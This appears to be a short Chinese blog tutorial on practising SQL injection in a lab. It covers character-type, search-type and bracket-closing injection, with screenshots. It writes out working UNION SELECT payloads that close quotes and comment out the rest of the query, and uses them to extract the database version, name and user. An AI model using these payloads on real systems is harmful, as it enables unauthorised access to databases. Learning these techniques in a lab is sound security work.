一、字符型注入
1.判断column列数
![](https://img-blog.csdnimg.cn/655c3859e00b40a2a98162eb6aa7df79.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5rOV5aSW54uC5b6S6ICB5YWt,size_20,color_FFFFFF,t_70,g_se,x_16)
注意:前面加上'进行闭合,中间是判断列数的sql语句,后面的注释掉
在url中要这么写
1'+union+select+1%2C2%23或者
1'+union+select+1,2--+
2.页面源文件代码
![](https://img-blog.csdnimg.cn/48debf922b9a4088abb44ecc9242ffcd.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5rOV5aSW54uC5b6S6ICB5YWt,size_20,color_FFFFFF,t_70,g_se,x_16)
4.传入数据库的语句
(在源文件中用echo $query显示到页面中)
![](https://img-blog.csdnimg.cn/16f3cf0f1da545e6b601390feb8d812c.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5rOV5aSW54uC5b6S6ICB5YWt,size_20,color_FFFFFF,t_70,g_se,x_16)
5.查看数据库名和版本号
![](https://img-blog.csdnimg.cn/2b7ecb69dc744ce995a26c969a4403dc.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5rOV5aSW54uC5b6S6ICB5YWt,size_20,color_FFFFFF,t_70,g_se,x_16)
接下来注入语句和数字型类同。
二、搜索型注入
1.搜索型文件源码
![](https://img-blog.csdnimg.cn/56815a4421c14ac79f0ab374300ff44d.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5rOV5aSW54uC5b6S6ICB5YWt,size_20,color_FFFFFF,t_70,g_se,x_16)
2.注入语句:
1%' union select 1,2,3#
3.获取数据库版本,数据库名,和用户名
1%' union select version(),database(),user()#
得到结果如下:
![](https://img-blog.csdnimg.cn/2fe087bb1f3b48748f1255e2d6ad988f.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5rOV5aSW54uC5b6S6ICB5YWt,size_18,color_FFFFFF,t_70,g_se,x_16)
三、xx型注入
和上述方法类同
(1)注入语句:
12213')+union+select+1,2+%23
(2)查看数据库名称和用户
121321')+union+select+version(),database()+%23
得到结果,随后进行表名列名的查询
![](https://img-blog.csdnimg.cn/fbe8007463a746c6a49ad269e1b083e1.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5rOV5aSW54uC5b6S6ICB5YWt,size_17,color_FFFFFF,t_70,g_se,x_16)